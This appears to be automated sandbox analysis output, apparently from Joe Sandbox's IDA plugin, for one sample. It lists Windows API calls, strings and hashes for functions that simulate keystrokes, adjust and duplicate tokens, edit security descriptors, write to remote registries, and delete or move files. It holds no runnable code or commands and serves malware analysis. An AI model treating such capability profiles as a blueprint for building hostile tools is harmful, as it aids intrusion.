                                                                  • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                                  • API String ID: 1357608183-1798697756
                                                                  • Opcode ID: 75d07af823a685f94e0ce4e14fda7ade19d38667ad2e8d0bdf7fb10132b635a3
                                                                  • Instruction ID: c011f42099b69b5e758004632a59df41e5184039a35a76dc120906a7e6ed0847
                                                                  • Opcode Fuzzy Hash: 75d07af823a685f94e0ce4e14fda7ade19d38667ad2e8d0bdf7fb10132b635a3
                                                                  • Instruction Fuzzy Hash: 5893A271E04219DFDB24CFA8C881BADB7B5FF48310F25856AE955AB281E774AD81CB40
                                                                  APIs
                                                                  • GetForegroundWindow.USER32(00000000,?), ref: 008F48DF
                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0092D665
                                                                  • IsIconic.USER32(?), ref: 0092D66E
                                                                  • ShowWindow.USER32(?,00000009), ref: 0092D67B
                                                                  • SetForegroundWindow.USER32(?), ref: 0092D685
                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0092D69B
                                                                  • GetCurrentThreadId.KERNEL32 ref: 0092D6A2
                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 0092D6AE
                                                                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 0092D6BF
                                                                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 0092D6C7
                                                                  • AttachThreadInput.USER32(00000000,?,00000001), ref: 0092D6CF
                                                                  • SetForegroundWindow.USER32(?), ref: 0092D6D2
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0092D6E7
                                                                  • keybd_event.USER32(00000012,00000000), ref: 0092D6F2
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0092D6FC
                                                                  • keybd_event.USER32(00000012,00000000), ref: 0092D701
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0092D70A
                                                                  • keybd_event.USER32(00000012,00000000), ref: 0092D70F
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0092D719
                                                                  • keybd_event.USER32(00000012,00000000), ref: 0092D71E
                                                                  • SetForegroundWindow.USER32(?), ref: 0092D721
                                                                  • AttachThreadInput.USER32(?,?,00000000), ref: 0092D748
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                  • String ID: Shell_TrayWnd
                                                                  • API String ID: 4125248594-2988720461
                                                                  • Opcode ID: 0b3fd9034704f59549e0b8e63d0270e665ee785b692cd9ba60a2a8fd9449e5f9
                                                                  • Instruction ID: d4267b291cb3c6be16eec2719e2dc44b0335bffb9200d71650ff181b695dbfad
                                                                  • Opcode Fuzzy Hash: 0b3fd9034704f59549e0b8e63d0270e665ee785b692cd9ba60a2a8fd9449e5f9
                                                                  • Instruction Fuzzy Hash: 3F315272A55318BAEB206B619C89F7F7F6CEB44B50F104025FA08FA1D1C6B45941BAA1
                                                                  APIs
                                                                    • Part of subcall function 009487E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0094882B
                                                                    • Part of subcall function 009487E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00948858
                                                                    • Part of subcall function 009487E1: GetLastError.KERNEL32 ref: 00948865
                                                                  • _memset.LIBCMT ref: 00948353
                                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 009483A5
                                                                  • CloseHandle.KERNEL32(?), ref: 009483B6
                                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 009483CD
                                                                  • GetProcessWindowStation.USER32 ref: 009483E6
                                                                  • SetProcessWindowStation.USER32(00000000), ref: 009483F0
                                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0094840A
                                                                    • Part of subcall function 009481CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00948309), ref: 009481E0
                                                                    • Part of subcall function 009481CB: CloseHandle.KERNEL32(?,?,00948309), ref: 009481F2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                  • String ID: $default$winsta0
                                                                  • API String ID: 2063423040-1027155976
                                                                  • Opcode ID: 6d8f13299ccb7feb6d4db3120efe911111542bbe782964eb064ffb931256809c
                                                                  • Instruction ID: 1998e201dceaffb05232e3112de5a5daac7669311f5f398e88482d78b36340e0
                                                                  • Opcode Fuzzy Hash: 6d8f13299ccb7feb6d4db3120efe911111542bbe782964eb064ffb931256809c
                                                                  • Instruction Fuzzy Hash: 42814872904209AFDF11AFA4DC45EEFBBB8EF08704F1441A9F914B6261DB318E54DB20
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0095C78D
                                                                  • FindClose.KERNEL32(00000000), ref: 0095C7E1
                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0095C806
                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0095C81D
                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0095C844
                                                                  • __swprintf.LIBCMT ref: 0095C890
                                                                  • __swprintf.LIBCMT ref: 0095C8D3
                                                                    • Part of subcall function 008F7DE1: _memmove.LIBCMT ref: 008F7E22
                                                                  • __swprintf.LIBCMT ref: 0095C927
                                                                    • Part of subcall function 00913698: __woutput_l.LIBCMT ref: 009136F1
                                                                  • __swprintf.LIBCMT ref: 0095C975
                                                                    • Part of subcall function 00913698: __flsbuf.LIBCMT ref: 00913713
                                                                    • Part of subcall function 00913698: __flsbuf.LIBCMT ref: 0091372B
                                                                  • __swprintf.LIBCMT ref: 0095C9C4
                                                                  • __swprintf.LIBCMT ref: 0095CA13
                                                                  • __swprintf.LIBCMT ref: 0095CA62
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                  • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                  • API String ID: 3953360268-2428617273
                                                                  • Opcode ID: 50ffa7560aeee22cf0e0c3dddaeb09cfa6296646fbfe5681aea94f85c21db1f0
                                                                  • Instruction ID: 617f0c507c2eca655155771cc897b548f3990686bc869cf8fb235412bc6dc634
                                                                  • Opcode Fuzzy Hash: 50ffa7560aeee22cf0e0c3dddaeb09cfa6296646fbfe5681aea94f85c21db1f0
                                                                  • Instruction Fuzzy Hash: D1A11EB1508308ABD744EBA4D886EBFB7ECFF94704F404929F695C6151EA34DA48CB63
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0095EFB6
                                                                  • _wcscmp.LIBCMT ref: 0095EFCB
                                                                  • _wcscmp.LIBCMT ref: 0095EFE2
                                                                  • GetFileAttributesW.KERNEL32(?), ref: 0095EFF4
                                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 0095F00E
                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0095F026
                                                                  • FindClose.KERNEL32(00000000), ref: 0095F031
                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 0095F04D
                                                                  • _wcscmp.LIBCMT ref: 0095F074
                                                                  • _wcscmp.LIBCMT ref: 0095F08B
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0095F09D
                                                                  • SetCurrentDirectoryW.KERNEL32(009A8920), ref: 0095F0BB
                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 0095F0C5
                                                                  • FindClose.KERNEL32(00000000), ref: 0095F0D2
                                                                  • FindClose.KERNEL32(00000000), ref: 0095F0E4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                  • String ID: *.*
                                                                  • API String ID: 1803514871-438819550
                                                                  • Opcode ID: 00a6db8b9c98bf2575ee3e72623bb880fc8a1b975cc934b5033d54b7682a73c6
                                                                  • Instruction ID: d62e23402fb1f5457b4bcbc495c6f128b068187d3b07dd6c2822a98a54158bc7
                                                                  • Opcode Fuzzy Hash: 00a6db8b9c98bf2575ee3e72623bb880fc8a1b975cc934b5033d54b7682a73c6
                                                                  • Instruction Fuzzy Hash: BA31D2325042186ACF14DBB5DC68AEE77ACAF89361F144175EC18E20D1EB70DA88DB61
                                                                  APIs
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00970953
                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,0097F910,00000000,?,00000000,?,?), ref: 009709C1
                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00970A09
                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00970A92
                                                                  • RegCloseKey.ADVAPI32(?), ref: 00970DB2
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00970DBF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Close$ConnectCreateRegistryValue
                                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                  • API String ID: 536824911-966354055
                                                                  • Opcode ID: afb49e5f834ab58c65b006db04c02d2641332b13e21a89c392b0f18721bfdbda
                                                                  • Instruction ID: 0155d65503c648a9be0e3ced6d917ffec8aa4367897f473cc51cac1239b76097
                                                                  • Opcode Fuzzy Hash: afb49e5f834ab58c65b006db04c02d2641332b13e21a89c392b0f18721bfdbda
                                                                  • Instruction Fuzzy Hash: 07024C766146059FCB14EF28C855E2AB7E5FF89314F04846CF9999B3A2DB30ED41CB82
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0095F113
                                                                  • _wcscmp.LIBCMT ref: 0095F128
                                                                  • _wcscmp.LIBCMT ref: 0095F13F
                                                                    • Part of subcall function 00954385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 009543A0
                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0095F16E
                                                                  • FindClose.KERNEL32(00000000), ref: 0095F179
                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 0095F195
                                                                  • _wcscmp.LIBCMT ref: 0095F1BC
                                                                  • _wcscmp.LIBCMT ref: 0095F1D3
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0095F1E5
                                                                  • SetCurrentDirectoryW.KERNEL32(009A8920), ref: 0095F203
                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 0095F20D
                                                                  • FindClose.KERNEL32(00000000), ref: 0095F21A
                                                                  • FindClose.KERNEL32(00000000), ref: 0095F22C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                  • String ID: *.*
                                                                  • API String ID: 1824444939-438819550
                                                                  • Opcode ID: b1adce6437091c5b60081c83d07507e34f31a1c2b6affdd782b4c7a8acf93382
                                                                  • Instruction ID: 9c4368ab75a452c0cdff0746934d7582bb862b36fd46bc1214119d769d4b0979
                                                                  • Opcode Fuzzy Hash: b1adce6437091c5b60081c83d07507e34f31a1c2b6affdd782b4c7a8acf93382
                                                                  • Instruction Fuzzy Hash: F531F536504619AACF10DB61EC68EEE77AC9F85375F104175FC18E20A0EB30DE89CB94
                                                                  APIs
                                                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0095A20F
                                                                  • __swprintf.LIBCMT ref: 0095A231
                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 0095A26E
                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0095A293
                                                                  • _memset.LIBCMT ref: 0095A2B2
                                                                  • _wcsncpy.LIBCMT ref: 0095A2EE
                                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0095A323
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0095A32E
                                                                  • RemoveDirectoryW.KERNEL32(?), ref: 0095A337
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0095A341
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                  • String ID: :$\$\??\%s
                                                                  • API String ID: 2733774712-3457252023
                                                                  • Opcode ID: 526189a17238e680a8065b5d2d796e3e9b8bb452e43fdf41b473df7d0976feb2
                                                                  • Instruction ID: 0214e6b37c85b07f4c5784908dc46c7ebfba24b61d3d9eeda0acc106fb1a65cf
                                                                  • Opcode Fuzzy Hash: 526189a17238e680a8065b5d2d796e3e9b8bb452e43fdf41b473df7d0976feb2
                                                                  • Instruction Fuzzy Hash: BB31E77690410AABDB20DFA1DC49FEF37BCEF89745F1041B6F908E6160EB7096848B25
                                                                  APIs
                                                                    • Part of subcall function 00948202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0094821E
                                                                    • Part of subcall function 00948202: GetLastError.KERNEL32(?,00947CE2,?,?,?), ref: 00948228
                                                                    • Part of subcall function 00948202: GetProcessHeap.KERNEL32(00000008,?,?,00947CE2,?,?,?), ref: 00948237
                                                                    • Part of subcall function 00948202: HeapAlloc.KERNEL32(00000000,?,00947CE2,?,?,?), ref: 0094823E
                                                                    • Part of subcall function 00948202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00948255
                                                                    • Part of subcall function 0094829F: GetProcessHeap.KERNEL32(00000008,00947CF8,00000000,00000000,?,00947CF8,?), ref: 009482AB
                                                                    • Part of subcall function 0094829F: HeapAlloc.KERNEL32(00000000,?,00947CF8,?), ref: 009482B2
                                                                    • Part of subcall function 0094829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00947CF8,?), ref: 009482C3
                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00947D13
                                                                  • _memset.LIBCMT ref: 00947D28
                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00947D47
                                                                  • GetLengthSid.ADVAPI32(?), ref: 00947D58
                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00947D95
                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00947DB1
                                                                  • GetLengthSid.ADVAPI32(?), ref: 00947DCE
                                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00947DDD
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00947DE4
                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00947E05
                                                                  • CopySid.ADVAPI32(00000000), ref: 00947E0C
                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00947E3D
                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00947E63
                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00947E77
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                  • String ID:
                                                                  • API String ID: 3996160137-0
                                                                  • Opcode ID: c50549e22134a40ceb329dd190c4c50600188bb2146f093845d518d54f9fae5d
                                                                  • Instruction ID: c9eedee99af9a3986d9d622164ae4ccdcd6c5bc2d6ebc8695c59b6f2eba34cf7
                                                                  • Opcode Fuzzy Hash: c50549e22134a40ceb329dd190c4c50600188bb2146f093845d518d54f9fae5d
                                                                  • Instruction Fuzzy Hash: D5614971908209AFDF00DFA4DC95EEEBBB9FF44300F048269E915A72A1DB319A45DB60
                                                                  Strings
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                  • API String ID: 0-4052911093
                                                                  • Opcode ID: 3937129eb20bff8e041a456ed8923727e850c002432192337ceb69cbe2b95e21
                                                                  • Instruction ID: d59f21b670bdff1b7ba8d3eaa886a87337ad63c9cd03d170b0ae4559254ba16a
                                                                  • Opcode Fuzzy Hash: 3937129eb20bff8e041a456ed8923727e850c002432192337ceb69cbe2b95e21
                                                                  • Instruction Fuzzy Hash: 61726075E04229DFDB24CF58C880BAEB7B5FF48710F14816AE959EB290E7749D81CB90
                                                                  APIs
                                                                  • GetKeyboardState.USER32(?), ref: 00950097
                                                                  • SetKeyboardState.USER32(?), ref: 00950102
                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00950122
                                                                  • GetKeyState.USER32(000000A0), ref: 00950139
                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00950168
                                                                  • GetKeyState.USER32(000000A1), ref: 00950179
                                                                  • GetAsyncKeyState.USER32(00000011), ref: 009501A5
                                                                  • GetKeyState.USER32(00000011), ref: 009501B3
                                                                  • GetAsyncKeyState.USER32(00000012), ref: 009501DC
                                                                  • GetKeyState.USER32(00000012), ref: 009501EA
                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00950213
                                                                  • GetKeyState.USER32(0000005B), ref: 00950221
                                                                  Similarity
                                                                  • API ID: State$Async$Keyboard
                                                                  • String ID:
                                                                  • API String ID: 541375521-0
                                                                  • Opcode ID: 211ee86ce309ff8061960b9da21da81b023778b2034529bc922987a5fffe657e
                                                                  • Instruction ID: f16a308214009e1b50d35ccf63415d2006a49416e9cd99dc39a783d8ee22566e
                                                                  • Opcode Fuzzy Hash: 211ee86ce309ff8061960b9da21da81b023778b2034529bc922987a5fffe657e
                                                                  • Instruction Fuzzy Hash: 80512E3090878829FB34DB7188547EABFB89F81381F08459EDDC6575C3DAA49B8CC762
                                                                  APIs
                                                                    • Part of subcall function 00970E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0096FDAD,?,?), ref: 00970E31
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009704AC
                                                                    • Part of subcall function 008F9837: __itow.LIBCMT ref: 008F9862
                                                                    • Part of subcall function 008F9837: __swprintf.LIBCMT ref: 008F98AC
                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0097054B
                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 009705E3
                                                                  • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00970822
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0097082F
                                                                  Similarity
                                                                  • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                  • String ID:
                                                                  • API String ID: 1240663315-0
                                                                  • Opcode ID: cd0d0b1bfd62d9902d894d11f8fa90ce126c869194b454d7fded0e6f8e4bbe95
                                                                  • Instruction ID: 6fc06bf9bab21214139482a429c82b1b2e1032f53a9293378db53bd18870f7c1
                                                                  • Opcode Fuzzy Hash: cd0d0b1bfd62d9902d894d11f8fa90ce126c869194b454d7fded0e6f8e4bbe95
                                                                  • Instruction Fuzzy Hash: 4EE14D71204204EFCB14DF28C895E6ABBE8FF89714F04C96DF949DB2A1D631E941CB92
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                  • String ID:
                                                                  • API String ID: 1737998785-0
                                                                  • Opcode ID: d600bf7412b6d987014860c7ca581ec344f3090f240fc1e8a35f2a4bb5349402
                                                                  • Instruction ID: 9ad18c4ecf6908b30d0610f404c2fb2b764373cc0da7b27270d82aee9d44a808
                                                                  • Opcode Fuzzy Hash: d600bf7412b6d987014860c7ca581ec344f3090f240fc1e8a35f2a4bb5349402
                                                                  • Instruction Fuzzy Hash: 8E21E5362182189FDB00AF64DC19B6D7BA8FF55750F118026F949EB2B1CB34AC40DB85
                                                                  APIs
                                                                    • Part of subcall function 008F4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008F4743,?,?,008F37AE,?), ref: 008F4770
                                                                    • Part of subcall function 00954A31: GetFileAttributesW.KERNEL32(?,0095370B), ref: 00954A32
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 009538A3
                                                                  • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0095394B
                                                                  • MoveFileW.KERNEL32(?,?), ref: 0095395E
                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0095397B
                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 0095399D
                                                                  • FindClose.KERNEL32(00000000,?,?,?,?), ref: 009539B9
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                  • String ID: \*.*
                                                                  • API String ID: 4002782344-1173974218
                                                                  • Opcode ID: 850f2b575b0914675058af4fa1c04cf00543c90433dc086876049e5c26210bb3
                                                                  • Instruction ID: 8ec60560af6712b86a83fa80b51c14812fc8b27ec17d811e8552bcea345e76cd
                                                                  • Opcode Fuzzy Hash: 850f2b575b0914675058af4fa1c04cf00543c90433dc086876049e5c26210bb3
                                                                  • Instruction Fuzzy Hash: 0F51AD3180414CAADF05EBB5D9A29FDB778AF14341F604069E906B7192EF716F0DCB62
                                                                  APIs
                                                                    • Part of subcall function 008F7DE1: _memmove.LIBCMT ref: 008F7E22
                                                                  • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0095F440
                                                                  • Sleep.KERNEL32(0000000A), ref: 0095F470
                                                                  • _wcscmp.LIBCMT ref: 0095F484
                                                                  • _wcscmp.LIBCMT ref: 0095F49F
                                                                  • FindNextFileW.KERNEL32(?,?), ref: 0095F53D
                                                                  • FindClose.KERNEL32(00000000), ref: 0095F553
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                  • String ID: *.*
                                                                  • API String ID: 713712311-438819550
                                                                  • Opcode ID: f686484ba7027409419f646a593f104493e0f7bc7b319013773a9d8399522403
                                                                  • Instruction ID: 7c88c9beb08de7b4c968530e8e7052dbb3a389ceb44c9e17a5296e7763bac2ac
                                                                  • Opcode Fuzzy Hash: f686484ba7027409419f646a593f104493e0f7bc7b319013773a9d8399522403
                                                                  • Instruction Fuzzy Hash: 08419E7190420D9BDF14DF68CC68AFEBBB8FF05321F104465F918A2190EB309A89CB51
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: _memmove
                                                                  • String ID:
                                                                  • API String ID: 4104443479-0
                                                                  • Opcode ID: 0e96ca1acbbe6925c4bfc8ce69f4f0f99ccaa3ad01ff2b2dc69a6f78eb5ffe7f
                                                                  • Instruction ID: d632f1b7ff8fc0e5042fa40c08c4836dd16f069a6f883edaa853772e146a8353
                                                                  • Opcode Fuzzy Hash: 0e96ca1acbbe6925c4bfc8ce69f4f0f99ccaa3ad01ff2b2dc69a6f78eb5ffe7f
                                                                  • Instruction Fuzzy Hash: 66128A70A00A09DFDF04DFA5D981AEEB7F5FF88300F514529E946E7290EB3AA950CB51
                                                                  APIs
